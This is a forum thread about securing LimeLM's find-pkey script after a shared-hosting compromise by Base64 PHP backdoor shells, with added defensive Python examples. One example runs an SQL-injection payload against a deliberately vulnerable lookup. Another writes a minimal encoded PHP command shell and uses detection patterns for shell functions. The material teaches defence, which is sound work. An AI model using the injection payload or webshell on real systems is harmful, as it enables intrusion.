find key security query

I have searched the forum but couldn't see anything on this - what anti-hack security is there on the find key input box? (I have to ask as I have been hacked widely the last couple of days by a known and hard-working spammer (all known to the authorities).)

As a rule we assume any data coming from any user (even good users) is dirty, filthy data. That is, nothing touches our databases without being properly cleaned and quoted. We do frequent internal security audits to ensure things like SQL injections do nothing more than be silently rejected by our system.

Now, to answer your question more directly, I'll assume you mean the "find-pkey" example in the web API. The general rules of internet security apply to that script. That is, if a hacker has access to your box (let's say through a vulnerability in Apache) then they will have access to your LimeLM API key and they can do anything they want with your account. We monitor for odd behavior like this on our end.

If your server is secure (you're using the latest patched versions of all your software) then the script will be fine. That is, there are no vulnerabilities in the script.
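The "properly cleaned and quoted" rule in the answer above, shown as an added example that is not part of this thread and is not LimeLM's own code: a string-concatenated product-key lookup beside a hardened one that allowlists the key's shape and binds it as a query parameter. The table, the key format and the `find_pkey_*` names are assumptions made for the demonstration; SQLite is used only because it runs in memory without a server.

```python
import re
import sqlite3

# Constructed sample table (not LimeLM's schema): product keys and their owners.
SAMPLE_KEYS = [
    ("ABCD-1234-EFGH", "alice@example.com"),
    ("WXYZ-5678-QRST", "bob@example.com"),
]

# Hypothetical key format used as an allowlist: three groups of A-Z/0-9 joined by hyphens.
PKEY_FORMAT = re.compile(r"^[A-Z0-9]{4}(-[A-Z0-9]{4}){2}$")


def open_sample_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pkeys (pkey TEXT PRIMARY KEY, email TEXT NOT NULL)")
    conn.executemany("INSERT INTO pkeys VALUES (?, ?)", SAMPLE_KEYS)
    return conn


def find_pkey_vulnerable(conn, user_input):
    """Deliberately unsafe: the input is spliced into the SQL text,
    so a single quote in it terminates the literal and the rest is parsed as SQL."""
    sql = "SELECT pkey, email FROM pkeys WHERE pkey = '" + user_input + "'"
    return conn.execute(sql).fetchall()


def find_pkey_safe(conn, user_input):
    """Hardened lookup: reject anything that is not shaped like a key,
    then bind the value as a parameter so it can only ever be compared as data."""
    if not PKEY_FORMAT.match(user_input):
        return []  # silently rejected, indistinguishable from "no such key"
    return conn.execute(
        "SELECT pkey, email FROM pkeys WHERE pkey = ?", (user_input,)
    ).fetchall()


def demo():
    conn = open_sample_db()
    injected = "' OR '1'='1"  # classic tautology: turns the WHERE clause into "always true"
    return {
        "vulnerable": find_pkey_vulnerable(conn, injected),
        "safe": find_pkey_safe(conn, injected),
        "legit": find_pkey_safe(conn, "ABCD-1234-EFGH"),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label:10s} -> {rows}")
```

The injected string dumps every row through the concatenated query, while the hardened version returns nothing for it and still finds a genuine key. Parameter binding alone is enough to stop the injection; the format check on top is what makes the rejection silent and also keeps junk out of logs and error paths.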

Thanks Wyatt, this is what happened. The host says it is due to malware on my PC, but Norton runs clean.

===================

Backdoor shells known to be associated with a variant of the Zeus crimeware botnet have been found to exist amongst the web files stored under your user(s) as of 05/02/2011:

(my user name)

The shell(s), a primary feature of an advanced threat malware attack, have been permanently deleted from your users' files. Using FTP credentials harvested by a botnet from malware on user PCs, a criminal malware gang is uploading backdoor hacker shells to victimized users, recording the location where their 28278-byte Base64-encoded PHP shell is located and then, a month or more later, hitting the shell via precise HTTP requests, injecting a blackhat SEO or malware payload into the code of sites under the above-listed user(s).
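The host's notice describes a Base64-encoded PHP shell dropped among the site's files and triggered later over HTTP. As an added example that is not from this thread and is not the host's or LimeLM's tooling, here is a small Python scanner that walks a web root, pulls long base64 runs out of PHP files, decodes them and flags any whose decoded body contains the primitives a shell needs (code or command execution plus reading attacker input), alongside the classic `eval(base64_decode(...))` loader. The sample site it builds, the file names and the regexes are all constructed for the demonstration; the one-liner shell it writes is a minimal stand-in, not the 28278-byte sample the host refers to.

```python
import base64
import os
import re
import tempfile

# Extensions the web server would execute as PHP.
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".inc")
# A long run of base64 alphabet characters: how an encoded shell body usually appears.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
# A decoder wrapped directly in eval()/assert(): the classic one-line loader.
DIRECT_LOADER = re.compile(
    rb"(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
)
# What a shell does once decoded: run code/commands and read attacker-supplied input.
SHELL_PRIMITIVES = re.compile(
    rb"\b(eval|system|passthru|shell_exec|exec|popen|proc_open)\s*\("
    rb"|\$_(GET|POST|REQUEST|COOKIE)\b"
)


def _decode_blob(blob):
    """Pad and decode a base64 run; anything that is not valid base64 yields b''."""
    blob += b"=" * (-len(blob) % 4)
    try:
        return base64.b64decode(blob, validate=True)
    except (ValueError, TypeError):
        return b""


def scan_file(path):
    """Return the reasons this file looks like an encoded PHP shell (empty if clean)."""
    with open(path, "rb") as fh:
        data = fh.read()
    reasons = []
    if DIRECT_LOADER.search(data):
        reasons.append("eval/assert wrapped directly around a decoder")
    for match in B64_RUN.finditer(data):
        hit = SHELL_PRIMITIVES.search(_decode_blob(match.group(0)))
        if hit:
            reasons.append(
                "base64 blob of %d bytes decodes to PHP using %s"
                % (len(match.group(0)), hit.group(0).decode("ascii", "replace"))
            )
            break  # one confirmed payload is enough to flag the file
    return reasons


def scan_tree(root):
    """Map each suspicious PHP file (path relative to root, '/'-separated) to its reasons."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(PHP_EXTENSIONS):
                path = os.path.join(dirpath, name)
                reasons = scan_file(path)
                if reasons:
                    rel = os.path.relpath(path, root).replace(os.sep, "/")
                    findings[rel] = reasons
    return findings


def build_sample_site():
    """Constructed sample web root: one clean page and one encoded shell hidden in uploads."""
    root = tempfile.mkdtemp(prefix="site-")
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'Hello, world'; ?>\n")
    # Minimal stand-in for a command shell: runs whatever arrives in ?cmd=
    payload = b"<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
    with open(os.path.join(uploads, "cache.php"), "wb") as fh:
        fh.write(b"<?php eval(base64_decode('" + base64.b64encode(payload) + b"')); ?>\n")
    return root


if __name__ == "__main__":
    for rel_path, why in scan_tree(build_sample_site()).items():
        print(rel_path)
        for reason in why:
            print("  -", reason)
```

Run against a real document root the scanner is a triage aid, not a verdict: legitimate plugins do embed base64 (images, fonts, serialized config), so the decoded-body check is what keeps noise down, and a decoded blob that is itself a second layer of encoding will still slip past a single decode. Pair it with the FTP and HTTP access logs for the flagged paths, since the notice above makes clear the upload and the later trigger requests are separate events.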

If they have access to your server then they have access to all passwords and keys you have stored there. So the first thing you should do is change your LimeLM API key on your settings page. Click the "Generate new key" button.

More generally you should consider moving off of "shared" hosting. Shared hosting is notoriously insecure because you're only as secure as the weakest piece of software running across all the hundreds of thousands of sites running on a shared host.